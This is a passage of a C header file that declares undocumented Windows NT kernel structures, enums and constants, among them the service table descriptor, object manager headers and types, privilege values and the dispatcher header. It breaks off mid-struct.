\tSysDbgGetKdBlockEnable,\n\tSysDbgSetKdBlockEnable,\n\tSysDbgRegisterForUmBreakInfo,\n\tSysDbgGetUmBreakPid,\n\tSysDbgClearUmBreakPid,\n\tSysDbgGetUmAttachPid,\n\tSysDbgClearUmAttachPid\n} SYSDBG_COMMAND, *PSYSDBG_COMMAND;\n#endif\n\n#ifndef _SYSDBG_VIRTUAL\ntypedef struct _SYSDBG_VIRTUAL\n{\n\tPVOID Address;\n\tPVOID Buffer;\n\tULONG Request;\n} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;\n#endif\n\n/*\n** Kernel Debugger END\n*/\n\n/*\n** System Table START\n*/\n#define NUMBER_SERVICE_TABLES 2\n#define SERVICE_NUMBER_MASK ((1 << 12) -  1)\n\n#if defined(_WIN64)\n\n#if defined(_AMD64_)\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 5)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)\n\n#endif\n\n#else\n\n#define SERVICE_TABLE_SHIFT (12 - 4)\n#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)\n#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)\n\n#endif\n\ntypedef struct 
_KSERVICE_TABLE_DESCRIPTOR {\n\tULONG_PTR Base; //e.g. KiServiceTable\n\tPULONG Count;\n\tULONG Limit;//e.g. KiServiceLimit\n\tPUCHAR Number; //e.g. KiArgumentTable\n} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;\n/*\n** System Table END\n*/\n\n\n/*\n** System Boot Environment START\n*/\n\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 // Size=20\n{\n\tstruct _GUID BootIdentifier;\n\tenum _FIRMWARE_TYPE FirmwareType;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;\n\ntypedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32\n{\n\tstruct _GUID BootIdentifier;\n\tenum _FIRMWARE_TYPE FirmwareType;\n\tunsigned __int64 BootFlags;\n} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;\n\n/*\n** System Boot Environment END\n*/\n\n/*\n** Mutant START\n*/\n\n#ifndef _MUTANT_INFORMATION_CLASS\ntypedef enum _MUTANT_INFORMATION_CLASS {\n\tMutantBasicInformation\n} MUTANT_INFORMATION_CLASS;\n#endif\n\n#ifndef _MUTANT_BASIC_INFORMATION\ntypedef struct _MUTANT_BASIC_INFORMATION {\n\tLONG CurrentCount;\n\tBOOLEAN OwnedByCaller;\n\tBOOLEAN AbandonedState;\n} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;\n#endif\n\n/*\n** Mutant END\n*/\n\n/*\n** Key START\n*/\n\n#ifndef _KEY_INFORMATION_CLASS \ntypedef enum _KEY_INFORMATION_CLASS {\n\tKeyBasicInformation,\n\tKeyNodeInformation,\n\tKeyFullInformation,\n\tKeyNameInformation,\n\tKeyCachedInformation,\n\tKeyFlagsInformation,\n\tMaxKeyInfoClass\n} KEY_INFORMATION_CLASS;\n#endif\n\n#ifndef _KEY_FULL_INFORMATION\ntypedef struct _KEY_FULL_INFORMATION {\n\tLARGE_INTEGER LastWriteTime;\n\tULONG   TitleIndex;\n\tULONG   ClassOffset;\n\tULONG   ClassLength;\n\tULONG   SubKeys;\n\tULONG   MaxNameLen;\n\tULONG   MaxClassLen;\n\tULONG   Values;\n\tULONG   MaxValueNameLen;\n\tULONG   MaxValueDataLen;\n\tWCHAR   Class[1];\n} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;\n#endif\n\n#ifndef _KEY_BASIC_INFORMATION\ntypedef struct _KEY_BASIC_INFORMATION 
{\n\tLARGE_INTEGER LastWriteTime;\n\tULONG TitleIndex;\n\tULONG NameLength;\n\tWCHAR Name[1];\n} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_INFORMATION_CLASS\ntypedef enum _KEY_VALUE_INFORMATION_CLASS {\n\tKeyValueBasicInformation,\n\tKeyValueFullInformation,\n\tKeyValuePartialInformation,\n\tKeyValueFullInformationAlign64,\n\tKeyValuePartialInformationAlign64,\n\tMaxKeyValueInfoClass\n} KEY_VALUE_INFORMATION_CLASS;\n#endif\n\n#ifndef _KEY_VALUE_BASIC_INFORMATION\ntypedef struct _KEY_VALUE_BASIC_INFORMATION {\n\tULONG   TitleIndex;\n\tULONG   Type;\n\tULONG   NameLength;\n\tWCHAR   Name[1];            // Variable size\n} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_FULL_INFORMATION\ntypedef struct _KEY_VALUE_FULL_INFORMATION {\n\tULONG   TitleIndex;\n\tULONG   Type;\n\tULONG   DataOffset;\n\tULONG   DataLength;\n\tULONG   NameLength;\n\tWCHAR   Name[1];            // Variable size\n\t//          Data[1];            // Variable size data not declared\n} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_PARTIAL_INFORMATION\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION {\n\tULONG   TitleIndex;\n\tULONG   Type;\n\tULONG   DataLength;\n\tUCHAR   Data[1];            // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;\n#endif\n\n#ifndef _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64\ntypedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {\n\tULONG   Type;\n\tULONG   DataLength;\n\tUCHAR   Data[1];            // Variable size\n} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;\n#endif\n\n#ifndef _KEY_VALUE_ENTRY\ntypedef struct _KEY_VALUE_ENTRY {\n\tPUNICODE_STRING ValueName;\n\tULONG           DataLength;\n\tULONG           DataOffset;\n\tULONG           Type;\n} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;\n#endif\n\n/*\n** Key END\n*/\n\n/*\n** IoCompletion START\n*/\n\n#ifndef 
_IO_COMPLETION_INFORMATION_CLASS\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS {\n\tIoCompletionBasicInformation\n} IO_COMPLETION_INFORMATION_CLASS;\n#endif\n\n#ifndef _IO_COMPLETION_BASIC_INFORMATION\ntypedef struct _IO_COMPLETION_BASIC_INFORMATION {\n\tLONG Depth;\n} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;\n#endif\n\n/*\n** IoCompletion END\n*/\n\n/*\n** Event START\n*/\n\n//\n// Event Specific Access Rights.\n//\n\ntypedef enum _EVENT_INFORMATION_CLASS {\n\tEventBasicInformation\n} EVENT_INFORMATION_CLASS;\n\ntypedef enum _EVENT_TYPE {\n\tNotificationEvent,\n\tSynchronizationEvent\n} EVENT_TYPE;\n\ntypedef struct _EVENT_BASIC_INFORMATION {\n\tEVENT_TYPE EventType;\n\tLONG EventState;\n} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;\n\n/*\n** Event END\n*/\n\n/*\n** TIME_FIELDS START\n*/\n\n#ifndef CSHORT\ntypedef short CSHORT;\n#endif\ntypedef struct _TIME_FIELDS {\n\tCSHORT Year;        // range [1601...]\n\tCSHORT Month;       // range [1..12]\n\tCSHORT Day;         // range [1..31]\n\tCSHORT Hour;        // range [0..23]\n\tCSHORT Minute;      // range [0..59]\n\tCSHORT Second;      // range [0..59]\n\tCSHORT Milliseconds;// range [0..999]\n\tCSHORT Weekday;     // range [0..6] == [Sunday..Saturday]\n} TIME_FIELDS;\ntypedef TIME_FIELDS *PTIME_FIELDS;\n\n/*\n** TIME_FIELDS END\n*/\n\n/*\n** HANDLE START\n*/\n\ntypedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {\n\tUSHORT UniqueProcessId;\n\tUSHORT CreatorBackTraceIndex;\n\tUCHAR ObjectTypeIndex;\n\tUCHAR HandleAttributes;\n\tUSHORT HandleValue;\n\tPVOID Object;\n\tULONG GrantedAccess;\n} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;\n\ntypedef struct _SYSTEM_HANDLE_INFORMATION {\n\tULONG NumberOfHandles;\n\tSYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];\n} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;\n\n/*\n** HANDLE END\n*/\n\n// Privileges\n\n#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)\n#define SE_CREATE_TOKEN_PRIVILEGE (2L)\n#define 
SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)\n#define SE_LOCK_MEMORY_PRIVILEGE (4L)\n#define SE_INCREASE_QUOTA_PRIVILEGE (5L)\n#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)\n#define SE_TCB_PRIVILEGE (7L)\n#define SE_SECURITY_PRIVILEGE (8L)\n#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)\n#define SE_LOAD_DRIVER_PRIVILEGE (10L)\n#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)\n#define SE_SYSTEMTIME_PRIVILEGE (12L)\n#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)\n#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)\n#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)\n#define SE_CREATE_PERMANENT_PRIVILEGE (16L)\n#define SE_BACKUP_PRIVILEGE (17L)\n#define SE_RESTORE_PRIVILEGE (18L)\n#define SE_SHUTDOWN_PRIVILEGE (19L)\n#define SE_DEBUG_PRIVILEGE (20L)\n#define SE_AUDIT_PRIVILEGE (21L)\n#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)\n#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)\n#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)\n#define SE_UNDOCK_PRIVILEGE (25L)\n#define SE_SYNC_AGENT_PRIVILEGE (26L)\n#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)\n#define SE_MANAGE_VOLUME_PRIVILEGE (28L)\n#define SE_IMPERSONATE_PRIVILEGE (29L)\n#define SE_CREATE_GLOBAL_PRIVILEGE (30L)\n#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)\n#define SE_RELABEL_PRIVILEGE (32L)\n#define SE_INC_WORKING_SET_PRIVILEGE (33L)\n#define SE_TIME_ZONE_PRIVILEGE (34L)\n#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)\n#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE\n\n#ifndef NT_SUCCESS\n#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)\n#endif\n\n/*\n** OBJECT MANAGER START\n*/\n\n//\n// Header flags\n//\n\n#define OB_FLAG_NEW_OBJECT              0x01\n#define OB_FLAG_KERNEL_OBJECT           0x02\n#define OB_FLAG_CREATOR_INFO            0x04\n#define OB_FLAG_EXCLUSIVE_OBJECT        0x08\n#define OB_FLAG_PERMANENT_OBJECT        0x10\n#define OB_FLAG_DEFAULT_SECURITY_QUOTA  0x20\n#define OB_FLAG_SINGLE_HANDLE_ENTRY     0x40\n#define OB_FLAG_DELETED_INLINE          0x80\n\n//\n// InfoMask values\n//\n\n#define 
OB_INFOMASK_PROCESS_INFO\t0x10\n#define OB_INFOMASK_QUOTA\t\t\t0x08\n#define OB_INFOMASK_HANDLE\t\t\t0x04\n#define OB_INFOMASK_NAME\t\t\t0x02\n#define OB_INFOMASK_CREATOR_INFO\t0x01\n\ntypedef PVOID *PDEVICE_MAP;\n\ntypedef struct _OBJECT_DIRECTORY_ENTRY {\n\tPVOID ChainLink;\n\tPVOID Object;\n\tULONG HashValue;\n} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;\n\ntypedef struct _EX_PUSH_LOCK {\n\tunion\n\t{\n\t\tstruct // flag bits packed into one ULONG; as direct union members they would all overlap at bit 0\n\t\t{\n\t\t\tULONG Locked : 1;\n\t\t\tULONG Waiting : 1;\n\t\t\tULONG Waking : 1;\n\t\t\tULONG MultipleShared : 1;\n\t\t\tULONG Shared : 28;\n\t\t};\n\t\tULONG Value;\n\t\tPVOID Ptr;\n\t};\n} EX_PUSH_LOCK, *PEX_PUSH_LOCK;\n\ntypedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {\n\tLIST_ENTRY HashBuckets[37];\n\tEX_PUSH_LOCK Lock;\n\tULONG NumberOfPrivateSpaces;\n} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;\n\ntypedef struct _OBJECT_NAMESPACE_ENTRY {\n\tLIST_ENTRY ListEntry;\n\tPVOID NamespaceRootDirectory;\n\tULONG SizeOfBoundaryInformation;\n\tULONG Reserved;\n\tUCHAR HashValue;\n\tULONG Alignment;\n} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;\n\ntypedef struct _OBJECT_DIRECTORY {\n\tPOBJECT_DIRECTORY_ENTRY HashBuckets[37];\n\tEX_PUSH_LOCK Lock;\n\tPDEVICE_MAP DeviceMap;\n\tULONG SessionId;\n\tPVOID NamespaceEntry;\n\tULONG Flags;\n} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;\n\ntypedef struct _OBJECT_HEADER_NAME_INFO {\n\tPOBJECT_DIRECTORY Directory;\n\tUNICODE_STRING Name;\n\tULONG QueryReferences;\n} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;\n\ntypedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tPVOID CreatorUniqueProcess; // Size=8 Offset=16\n\tUSHORT CreatorBackTraceIndex; // Size=2 Offset=24\n\tUSHORT Reserved; // Size=2 Offset=26\n} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;\n\ntypedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16\n\tPVOID Process; // Size=8 Offset=0\n\tstruct\n\t{\n\t\tunsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24\n\t\tunsigned long 
LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8\n\t};\n} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;\n\ntypedef struct _OBJECT_HEADER_HANDLE_INFO // Size=16\n{\n\tunion\n\t{\n\t\tPVOID HandleCountDataBase; // Size=8 Offset=0\n\t\tstruct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0\n\t};\n} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;\n\ntypedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16\n\tPVOID ExclusiveProcess; // Size=8 Offset=0\n\tunsigned __int64 Reserved; // Size=8 Offset=8\n} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;\n\ntypedef struct _OBJECT_HEADER_QUOTA_INFO {\n\tULONG PagedPoolCharge; //4\n\tULONG NonPagedPoolCharge; //4 \n\tULONG SecurityDescriptorCharge; //4\n\tPVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)\n\tunsigned __int64 Reserved; //sizeof(uint64)\n} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;\n\ntypedef struct _QUAD {\n\tunion\n\t{\n\t\tINT64 UseThisFieldToCopy;\n\t\tfloat DoNotUseThisField;\n\t};\n} QUAD, *PQUAD;\n\ntypedef struct _OBJECT_CREATE_INFORMATION {\n\tULONG Attributes;\n\tPVOID RootDirectory;\n\tCHAR ProbeMode;\n\tULONG PagedPoolCharge;\n\tULONG NonPagedPoolCharge;\n\tULONG SecurityDescriptorCharge;\n\tPVOID SecurityDescriptor;\n\tPSECURITY_QUALITY_OF_SERVICE SecurityQos;\n\tSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;\n} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;\n\ntypedef enum _POOL_TYPE {\n\tNonPagedPool = 0,\n\tNonPagedPoolExecute = 0,\n\tPagedPool = 1,\n\tNonPagedPoolMustSucceed = 2,\n\tDontUseThisType = 3,\n\tNonPagedPoolCacheAligned = 4,\n\tPagedPoolCacheAligned = 5,\n\tNonPagedPoolCacheAlignedMustS = 6,\n\tMaxPoolType = 7,\n\tNonPagedPoolBase = 0,\n\tNonPagedPoolBaseMustSucceed = 2,\n\tNonPagedPoolBaseCacheAligned = 4,\n\tNonPagedPoolBaseCacheAlignedMustS = 6,\n\tNonPagedPoolSession = 32,\n\tPagedPoolSession = 33,\n\tNonPagedPoolMustSucceedSession = 34,\n\tDontUseThisTypeSession = 35,\n\tNonPagedPoolCacheAlignedSession 
= 36,\n\tPagedPoolCacheAlignedSession = 37,\n\tNonPagedPoolCacheAlignedMustSSession = 38,\n\tNonPagedPoolNx = 512,\n\tNonPagedPoolNxCacheAligned = 516,\n\tNonPagedPoolSessionNx = 544\n} POOL_TYPE;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V1 {\n\tUSHORT          Length;\n\tBOOLEAN         UseDefaultObject;\n\tBOOLEAN         Reserved1;\n\tULONG           InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tACCESS_MASK     ValidAccessMask;\n\tBOOLEAN         SecurityRequired;\n\tBOOLEAN         MaintainHandleCount;\n\tBOOLEAN         MaintainTypeList;\n\tUCHAR           Reserved2;\n\tBOOLEAN         PagedPool;\n\tULONG           DefaultPagedPoolCharge;\n\tULONG           DefaultNonPagedPoolCharge;\n\tPVOID           DumpProcedure;\n\tPVOID           OpenProcedure;\n\tPVOID           CloseProcedure;\n\tPVOID           DeleteProcedure;\n\tPVOID           ParseProcedure;\n\tPVOID           SecurityProcedure;\n\tPVOID           QueryNameProcedure;\n\tPVOID           OkayToCloseProcedure;\n} OBJECT_TYPE_INITIALIZER_V1, *POBJECT_TYPE_INITIALIZER_V1;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V2 {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER_V2, 
*POBJECT_TYPE_INITIALIZER_V2;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_V3 {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n\tULONG WaitObjectFlagMask; // Size=4 Offset=112\n\tUSHORT WaitObjectFlagOffset; // Size=2 Offset=116\n\tUSHORT WaitObjectPointerOffset; // Size=2 Offset=118\n} OBJECT_TYPE_INITIALIZER_V3, *POBJECT_TYPE_INITIALIZER_V3;\n\ntypedef struct _OBJECT_TYPE_INITIALIZER {// Size=120\n\tUSHORT Length; // Size=2 Offset=0\n\tUCHAR ObjectTypeFlags; // Size=1 Offset=2\n\tULONG ObjectTypeCode; // Size=4 Offset=4\n\tULONG InvalidAttributes; // Size=4 Offset=8\n\tGENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n\tULONG ValidAccessMask; // Size=4 Offset=28\n\tULONG RetainAccess; // Size=4 Offset=32\n\tPOOL_TYPE PoolType; // Size=4 Offset=36\n\tULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n\tULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n\tPVOID DumpProcedure; // Size=8 Offset=48\n\tPVOID OpenProcedure; // Size=8 Offset=56\n\tPVOID CloseProcedure; // Size=8 Offset=64\n\tPVOID DeleteProcedure; // Size=8 Offset=72\n\tPVOID ParseProcedure; // Size=8 Offset=80\n\tPVOID SecurityProcedure; // Size=8 Offset=88\n\tPVOID QueryNameProcedure; // Size=8 
Offset=96\n\tPVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;\n\ntypedef struct _OBJECT_TYPE_V2 {// Size=216\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tUNICODE_STRING Name; // Size=16 Offset=16\n\tPVOID DefaultObject; // Size=8 Offset=32\n\tUCHAR Index; // Size=1 Offset=40\n\tULONG TotalNumberOfObjects; // Size=4 Offset=44\n\tULONG TotalNumberOfHandles; // Size=4 Offset=48\n\tULONG HighWaterNumberOfObjects; // Size=4 Offset=52\n\tULONG HighWaterNumberOfHandles; // Size=4 Offset=56\n\tOBJECT_TYPE_INITIALIZER_V2 TypeInfo;\n\tEX_PUSH_LOCK TypeLock;\n\tULONG Key;\n\tLIST_ENTRY CallbackList;\n} OBJECT_TYPE_V2, *POBJECT_TYPE_V2;\n\ntypedef struct _OBJECT_TYPE_V3 {// Size=216\n\tLIST_ENTRY TypeList; // Size=16 Offset=0\n\tUNICODE_STRING Name; // Size=16 Offset=16\n\tPVOID DefaultObject; // Size=8 Offset=32\n\tUCHAR Index; // Size=1 Offset=40\n\tULONG TotalNumberOfObjects; // Size=4 Offset=44\n\tULONG TotalNumberOfHandles; // Size=4 Offset=48\n\tULONG HighWaterNumberOfObjects; // Size=4 Offset=52\n\tULONG HighWaterNumberOfHandles; // Size=4 Offset=56\n\tOBJECT_TYPE_INITIALIZER_V3 TypeInfo;\n\tEX_PUSH_LOCK TypeLock;\n\tULONG Key;\n\tLIST_ENTRY CallbackList;\n} OBJECT_TYPE_V3, *POBJECT_TYPE_V3;\n\ntypedef struct _OBJECT_TYPE_COMPATIBLE {\n\tLIST_ENTRY TypeList;\n\tUNICODE_STRING Name;\n\tPVOID DefaultObject;\n\tUCHAR Index;\n\tULONG TotalNumberOfObjects;\n\tULONG TotalNumberOfHandles;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tOBJECT_TYPE_INITIALIZER_V2 TypeInfo;\n} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;\n\n/*\n** brand new header starting from 6.1\n*/\n\ntypedef struct _OBJECT_HEADER {\n\tLONG PointerCount;\n\tunion\n\t{\n\t\tLONG HandleCount;\n\t\tPVOID NextToFree;\n\t};\n\tEX_PUSH_LOCK Lock;\n\tUCHAR TypeIndex;\n\tUCHAR TraceFlags;\n\tUCHAR InfoMask;\n\tUCHAR Flags;\n\tunion\n\t{\n\t\tPOBJECT_CREATE_INFORMATION ObjectCreateInfo;\n\t\tPVOID QuotaBlockCharged;\n\t};\n\tPVOID 
SecurityDescriptor;\n\tQUAD Body;\n} OBJECT_HEADER, *POBJECT_HEADER;\n\n#define OBJECT_TO_OBJECT_HEADER(obj) \\\n    CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )\n\n/*\n** OBJECT MANAGER END\n*/\n\n/*\n* WDM START\n*/\n#define TIMER_TOLERABLE_DELAY_BITS      6\n#define TIMER_EXPIRED_INDEX_BITS        6\n#define TIMER_PROCESSOR_INDEX_BITS      5\n\ntypedef struct _DISPATCHER_HEADER {\n\tunion {\n\t\tunion {\n\t\t\tvolatile LONG Lock;\n\t\t\tLONG LockNV;\n\t\t} DUMMYUNIONNAME;\n\n\t\tstruct {                            // Events, Semaphores, Gates, etc.\n\t\t\tUCHAR Type;                     // All (accessible via KOBJECT_TYPE)\n\t\t\tUCHAR Signalling;\n\t\t\tUCHAR Size;\n\t\t\tUCHAR Reserved1;\n\t\t} DUMMYSTRUCTNAME;\n\n\t\tstruct {                            // Timer\n\t\t\tUCHAR TimerType;\n\t\t\tunion {\n\t\t\t\tUCHAR TimerControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Absolute : 1;\n\t\t\t\t\tUCHAR Wake : 1;\n\t\t\t\t\tUCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t};\n\n\t\t\tUCHAR Hand;\n\t\t\tunion {\n\t\t\t\tUCHAR TimerMiscFlags;\n\t\t\t\tstruct {\n\n#if !defined(KENCODED_TIMER_PROCESSOR)\n\n\t\t\t\t\tUCHAR Index : TIMER_EXPIRED_INDEX_BITS;\n\n#else\n\n\t\t\t\t\tUCHAR Index : 1;\n\t\t\t\t\tUCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;\n\n#endif\n\n\t\t\t\t\tUCHAR Inserted : 1;\n\t\t\t\t\tvolatile UCHAR Expired : 1;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\t\t} DUMMYSTRUCTNAME2;\n\n\t\tstruct {                            // Timer2\n\t\t\tUCHAR Timer2Type;\n\t\t\tunion {\n\t\t\t\tUCHAR Timer2Flags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Timer2Inserted : 1;\n\t\t\t\t\tUCHAR Timer2Expiring : 1;\n\t\t\t\t\tUCHAR Timer2CancelPending : 1;\n\t\t\t\t\tUCHAR Timer2SetPending : 1;\n\t\t\t\t\tUCHAR Timer2Running : 1;\n\t\t\t\t\tUCHAR Timer2Disabled : 1;\n\t\t\t\t\tUCHAR Timer2ReservedFlags : 2;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tUCHAR Timer2Reserved1;\n\t\t\tUCHAR 
Timer2Reserved2;\n\t\t} DUMMYSTRUCTNAME3;\n\n\t\tstruct {                            // Queue\n\t\t\tUCHAR QueueType;\n\t\t\tunion {\n\t\t\t\tUCHAR QueueControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR Abandoned : 1;\n\t\t\t\t\tUCHAR DisableIncrement : 1;\n\t\t\t\t\tUCHAR QueueReservedControlFlags : 6;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tUCHAR QueueSize;\n\t\t\tUCHAR QueueReserved;\n\t\t} DUMMYSTRUCTNAME4;\n\n\t\tstruct {                            // Thread\n\t\t\tUCHAR ThreadType;\n\t\t\tUCHAR ThreadReserved;\n\t\t\tunion {\n\t\t\t\tUCHAR ThreadControlFlags;\n\t\t\t\tstruct {\n\t\t\t\t\tUCHAR CycleProfiling : 1;\n\t\t\t\t\tUCHAR CounterProfiling : 1;\n\t\t\t\t\tUCHAR GroupScheduling : 1;\n\t\t\t\t\tUCHAR AffinitySet : 1;\n\t\t\t\t\tUCHAR ThreadReservedControlFlags : 4;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\t\t\t} DUMMYUNIONNAME;\n\n\t\t\tunion {\n\t\t\t\tUCHAR DebugActive;\n\n#if !defined(_X86_)\n\n\t\t\t\tstruct {\n\t\t\t\t\tBOOLEAN ActiveDR7 : 1;\n\t\t\t\t\tBOOLEAN Instrumented : 1;\n\t\t\t\t\tBOOLEAN Minimal : 1;\n\t\t\t\t\tBOOLEAN Reserved4 : 3;\n\t\t\t\t\tBOOLEAN UmsScheduled : 1;\n\t\t\t\t\tBOOLEAN UmsPrimary : 1;\n\t\t\t\t} DUMMYSTRUCTNAME;\n\n#endif\n\n\t\t\t} DUMMYUNIONNAME2;\n\t\t} DUMMYSTRUCTNAME5;\n\n\t\tstruct {                       